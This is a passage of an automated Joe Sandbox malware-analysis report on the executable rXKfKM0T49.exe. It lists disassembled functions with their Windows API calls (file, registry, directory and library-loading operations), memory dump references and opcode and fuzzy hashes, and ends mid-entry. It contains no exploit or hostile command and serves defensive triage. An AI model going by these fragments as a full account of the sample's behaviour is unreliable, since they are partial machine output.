                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Enum$CloseValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 397863658-0
                                                                                                            • Opcode ID: 962e8dbebea2d0e856bbe812d5e95e45bdf7d67f5620c7d5b12d357826d7025c
                                                                                                            • Instruction ID: 69a0bd767b5398a5b54c194fc83da7942780fa4e63ecbf8b5358c30743fc2944
                                                                                                            • Opcode Fuzzy Hash: 962e8dbebea2d0e856bbe812d5e95e45bdf7d67f5620c7d5b12d357826d7025c
                                                                                                            • Instruction Fuzzy Hash: 4B017171904204ABEB149F95DE88ABF7AB8EF80348F10403EF505B61D0DAB85E419B69
                                                                                                            Function 004031D6 Relevance: 3.1, APIs: 2, Instructions: 88COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 004031FB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FilePointer
                                                                                                            • String ID:
                                                                                                            • API String ID: 973152223-0
                                                                                                            • Opcode ID: 09b1e881bc629fe9623964bcd0dac9c3534a319fde10b4dd95dd132c0a2dd849
                                                                                                            • Instruction ID: f938e70baf20f89fc7421c1cbc4d65c8cbb1a4a40291e2e844035b0cdbff1196
                                                                                                            • Opcode Fuzzy Hash: 09b1e881bc629fe9623964bcd0dac9c3534a319fde10b4dd95dd132c0a2dd849
                                                                                                            • Instruction Fuzzy Hash: 53314B30200219BBDB109F95ED84ADA3E68EB04759F20857EF905E62D0D6789A509BA9
                                                                                                            Function 004015C1 Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,?,?,76F92EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,76F92EE0,00000000), ref: 00405D76
                                                                                                              • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                                                                              • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                                                                            • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                              • Part of subcall function 0040591F: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405962
                                                                                                            • SetCurrentDirectoryW.KERNELBASE(?,00436000,?,00000000,000000F0), ref: 0040164D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 1892508949-0
                                                                                                            • Opcode ID: c670449cb20163be3cb3cb34affd8c81282aa0e3ca4a40f31796d9e50139b1da
                                                                                                            • Instruction ID: 0139da5d792eeb989572d84d187c25f91b4f70b2bd1842bf542401118de2a59f
                                                                                                            • Opcode Fuzzy Hash: c670449cb20163be3cb3cb34affd8c81282aa0e3ca4a40f31796d9e50139b1da
                                                                                                            • Instruction Fuzzy Hash: 0511E631504511EBCF30AFA4CD4159F36A0EF15329B29453BFA45B22F1DB3E49419B5D
                                                                                                            Function 00402484 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 004024B5
                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nspC239.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseQueryValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 3356406503-0
                                                                                                            • Opcode ID: 63b64fe82c2f511c8169af5ec8c0190f19a921c94039209ad64b866aaad41420
                                                                                                            • Instruction ID: 8b4d26b48c61f4aea5aea8b01f6eaa690eaa4425e6198d6413393360261ed691
                                                                                                            • Opcode Fuzzy Hash: 63b64fe82c2f511c8169af5ec8c0190f19a921c94039209ad64b866aaad41420
                                                                                                            • Instruction Fuzzy Hash: 61119431910205EBDB14DF64CA585AE7BB4EF44348F20843FE445B72D0D6B85A81EB5A
                                                                                                            Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                            • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 3850602802-0
                                                                                                            • Opcode ID: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
                                                                                                            • Instruction ID: 4945fb4554c9d48a14a82d28c5fc4c127f2c3d85d8aa5c2a63fae023cf5e702c
                                                                                                            • Opcode Fuzzy Hash: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
                                                                                                            • Instruction Fuzzy Hash: AB01F431724210EBEB199B789D04B2A3698E710714F104A7FF855F62F1DA78CC529B5D
                                                                                                            Function 0040238E Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023B0
                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 004023B9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseDeleteValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 2831762973-0
                                                                                                            • Opcode ID: a00859f013a8106156cc87040160a2b11e5294e3cc8a521d5b70861134e176e9
                                                                                                            • Instruction ID: 92c71ce55c792e737e0c56b3c5c8c262173643586798c2a655fc457b9e75749a
                                                                                                            • Opcode Fuzzy Hash: a00859f013a8106156cc87040160a2b11e5294e3cc8a521d5b70861134e176e9
                                                                                                            • Instruction Fuzzy Hash: 5FF0F632E041109BE700BBA49B8EABE72A49B44314F29003FFE42F31C0CAF85D42976D
                                                                                                            Function 004067C2 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                              • Part of subcall function 00406752: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                                                                              • Part of subcall function 00406752: wsprintfW.USER32 ref: 004067A4
                                                                                                              • Part of subcall function 00406752: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 2547128583-0
                                                                                                            • Opcode ID: 32c59c0b14b548542ecf76b068d43d3c76fab82d66a171b1af570515759e8b4d
                                                                                                            • Instruction ID: 7b80e99db610fb1a261844a57c40f0e669857592e3492eb3b2a0c0f7ce0b312d
                                                                                                            • Opcode Fuzzy Hash: 32c59c0b14b548542ecf76b068d43d3c76fab82d66a171b1af570515759e8b4d
                                                                                                            • Instruction Fuzzy Hash: 14E086325042115BD21057745E48D3762AC9AC4704307843EF556F3041DB78DC35B66E
                                                                                                            Function 00405EDE Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\rXKfKM0T49.exe,80000000,00000003), ref: 00405EE2
                                                                                                            • CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$AttributesCreate
                                                                                                            • String ID:
                                                                                                            • API String ID: 415043291-0
                                                                                                            • Opcode ID: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                                                                            • Instruction ID: 5201df1ff3c0a0bd0294a98706b79309786c42e99614e685d4e3591f63f4d9e2
                                                                                                            • Opcode Fuzzy Hash: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                                                                            • Instruction Fuzzy Hash: D5D09E31254601AFEF098F20DE16F2E7AA2EB84B04F11552CB7C2940E0DA7158199B15
                                                                                                            Function 0040599C Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CreateDirectoryW.KERNELBASE(?,00000000,00403498,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,004036EF,?,00000006,00000008,0000000A), ref: 004059A2
                                                                                                            • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 004059B0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 1375471231-0
                                                                                                            • Opcode ID: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                                                                                            • Instruction ID: 01a40f06620425e1c555583f7199589d3835b04f5715874dbca4219b9923c3a9
                                                                                                            • Opcode Fuzzy Hash: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                                                                                            • Instruction Fuzzy Hash: D6C04C71216502DAF7115F31DF09B177A50AB60751F11843AA146E11A4DA349455D92D
                                                                                                            Function 70092AAC Relevance: 1.6, APIs: 1, Instructions: 143COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • EnumWindows.USER32(00000000), ref: 70092B6B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1855880593.0000000070091000.00000020.00000001.01000000.00000004.sdmp, Offset: 70090000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1855819178.0000000070090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1855965653.0000000070094000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1855996025.0000000070096000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_70090000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: EnumWindows
                                                                                                            • String ID:
                                                                                                            • API String ID: 1129996299-0
                                                                                                            • Opcode ID: fbe81cca3ce63233e93d6ca77eeeefbb2f8dd75c85b7eb2eb4a0dd4f70aee2d5
                                                                                                            • Instruction ID: 6779a5745e932a0618e7a6832aedf376df9a434e158e17617019e2c64eba9dab
                                                                                                            • Opcode Fuzzy Hash: fbe81cca3ce63233e93d6ca77eeeefbb2f8dd75c85b7eb2eb4a0dd4f70aee2d5
                                                                                                            • Instruction Fuzzy Hash: 0641BFB3420204DFEB21DF77DD42B4D37A5FB84B35F32442AF501A6121E734A881AB9A
                                                                                                            Function 0040167B Relevance: 1.5, APIs: 1, Instructions: 38fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • MoveFileW.KERNEL32(00000000,00000000), ref: 00401696
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileMove
                                                                                                            • String ID:
                                                                                                            • API String ID: 3562171763-0
                                                                                                            • Opcode ID: f4993909eaaf04b4d10f0c262de6f8e1be0fd70d19c578988f2b9bef0751c49c
                                                                                                            • Instruction ID: 73a88bd3a5ced7927151e6ebce11b30d6a6a5b8b2c4e1db0cab765602213b928
                                                                                                            • Opcode Fuzzy Hash: f4993909eaaf04b4d10f0c262de6f8e1be0fd70d19c578988f2b9bef0751c49c
                                                                                                            • Instruction Fuzzy Hash: CBF09031A0851197DF10BBA54F4DD5E22509B8236CB28073BB412B21E1DAFDC542A56E
                                                                                                            Function 004027EF Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 0040280D
                                                                                                              • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FilePointerwsprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 327478801-0
                                                                                                            • Opcode ID: 38b593970e7e5e8d656344d1d4c72dba1b6d10a1f376cfd8863b7a874be62c28
                                                                                                            • Instruction ID: 7217e66a6bf97858787bec6454aeb19e768c89e60d383eb7a66a1db5dd3d6cef
                                                                                                            • Opcode Fuzzy Hash: 38b593970e7e5e8d656344d1d4c72dba1b6d10a1f376cfd8863b7a874be62c28
                                                                                                            • Instruction Fuzzy Hash: 8BE06D71E00104ABD710DBA5AE098AEB7B8DB84308B60403BF601B10D0CA7959518E2E
                                                                                                            Function 00406283 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 004062AC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Create
                                                                                                            • String ID:
                                                                                                            • API String ID: 2289755597-0
                                                                                                            • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                            • Instruction ID: b492cd94208fe9a136032c47e7ca6226b28abdd7f17191690e67bc203102cabe
                                                                                                            • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                            • Instruction Fuzzy Hash: 94E0E672010209BEDF195F50DD0AD7B371DEB04304F11492EFA06D4051E6B5AD706634
                                                                                                            Function 00405F61 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414ED0,0040CED0,0040345A,0040A230,0040A230,0040335E,00414ED0,00004000,?,00000000,00403208), ref: 00405F75
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 2738559852-0
                                                                                                            • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                            • Instruction ID: 5f0138a6a2c6563494c064dd15accf188ef387db15323854b273470b931b092f
                                                                                                            • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                            • Instruction Fuzzy Hash: 7AE0EC3221025AAFDF109E959D04EFB7B6CEB05360F044836FD15E6150D675E8619BA4
                                                                                                            Function 00405F90 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,0040FF7C,0040CED0,004033DE,0040CED0,0040FF7C,00414ED0,00004000,?,00000000,00403208,00000004), ref: 00405FA4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
